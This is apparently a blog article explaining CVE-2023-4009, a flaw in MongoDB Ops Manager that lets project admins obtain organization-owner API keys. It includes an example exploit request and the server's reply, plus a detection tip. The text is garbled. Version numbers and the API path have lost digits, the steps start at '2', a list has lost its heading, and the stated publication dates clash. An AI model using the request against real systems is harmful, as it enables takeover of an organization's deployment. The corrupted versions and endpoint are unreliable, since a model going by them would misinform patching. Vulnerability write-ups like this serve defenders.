CVE-2023-4009 - Privilege Escalation in MongoDB Ops Manager – From Project User to Org Owner

Published: June 2024  
Severity: High  
Affected Products:

MongoDB Ops Manager v6. before 6..17

MongoDB Ops Manager is a widely used tool for managing MongoDB deployments, backups, and automation. In mid-2023, a dangerous security flaw was discovered: CVE-2023-4009. This bug allows someone with only *project-level* admin access to escalate their privileges — potentially all the way up to organization owner. This means a user with limited rights could take over the whole Ops Manager instance.

In this article, we’ll walk you through what the bug is, how it works, an example exploit, and how to protect your systems.

What’s the Issue?

In vulnerable versions of MongoDB Ops Manager (5. < 5..22 and 6. < 6..17), having ‘Project Owner’ or ‘Project User Admin’ role gave you a special kind of access inside a single project. But, due to a bug in API key management, such a user could trick the system into generating an API key with *organization* owner rights.

That means: you escalate your privileges from project admin to controlling the entire MongoDB deployment.

Reference:  
- MongoDB Advisory: CVE-2023-4009 (requires account)
- NIST NVD: CVE-2023-4009

Technical Details

The flaw lies in the *API key generation* process. Project-level admins can normally create API keys for automating certain tasks within their project. But, faulty input validation and role checking allowed requesting keys for higher roles (like orgOwner).

The server accepted the user-supplied role in the API request, rather than enforcing the user's actual role. As a result, with a carefully crafted request, you could make Ops Manager give you an ‘orgOwner’ API key.

Exploitation Example

Let’s step through a hypothetical attack, highlighting the code and API calls involved.

2. The Faulty API Call

You can use a tool like curl or Postman to send a POST request to the API endpoint for creating API keys.

Example vulnerable request

POST /api/public/v1./orgs/<orgId>/apikeys HTTP/1.1
Host: <ops-manager-host>:<port>
Authorization: Bearer <your_session_token>
Content-Type: application/json

{
  "desc": "Evil org owner key",
  "roles": ["ORG_OWNER"]
}

What should happen: The server should check your permissions and restrict you to project-level roles.  
What happens: The server accepts "ORG_OWNER" as a role, even though you shouldn’t have access!

If vulnerable, the server replies

{
  "id": "5f4e8a8d7f184f3e8f123456",
  "desc": "Evil org owner key",
  "roles": ["ORG_OWNER"],
  "publicKey": "<generatedPublicKey>",
  "privateKey": "<generatedPrivateKey>"
}

You now have an API key with org-wide administrative control!

Story in Simple Terms

Imagine you’re allowed to make keys for your apartment mailbox. By mistake, the building’s system lets you order a master key for every door—even though you’re just a tenant. That’s what happened here, digitally.

Full access to all projects.

- Ability to create/delete projects, users, clusters, and API keys.

For Defenders: How to Detect Attack Attempts

Check your Ops Manager logs for API requests to /orgs/<orgId>/apikeys with the "roles": ["ORG_OWNER"] JSON payload coming from non-owner accounts.

References

- CVE-2023-4009 Official NVD Entry
- MongoDB Security Advisories
- Ops Manager Documentation

Summary

CVE-2023-4009 is a major escalation bug in MongoDB Ops Manager. It allows project admins to become full organization owners by generating API keys with excessive privileges. As soon as you can, patch your Ops Manager and check for any suspicious API keys. Don’t let this bug turn a simple project user into the king of your database kingdom!

If you found this post useful, please share it with your team to keep everyone safe.


Stay secure!  
*Written exclusively for you – June 2024*

Timeline

Published on: 08/08/2023 09:15:00 UTC
Last modified on: 08/14/2023 16:32:00 UTC